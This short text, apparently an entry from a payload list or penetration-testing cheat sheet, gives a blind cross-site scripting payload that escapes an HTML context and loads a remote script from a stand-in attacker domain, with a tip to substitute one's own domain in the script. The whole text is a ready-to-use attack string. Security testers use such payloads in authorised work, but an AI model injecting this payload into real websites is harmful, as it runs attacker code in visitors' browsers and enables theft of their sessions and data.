Check for blind XSS. Usage example: "'></script><script src=//www.ATTACKER.com/x/j.js></script> PS. Please modify j.js by adding your domain.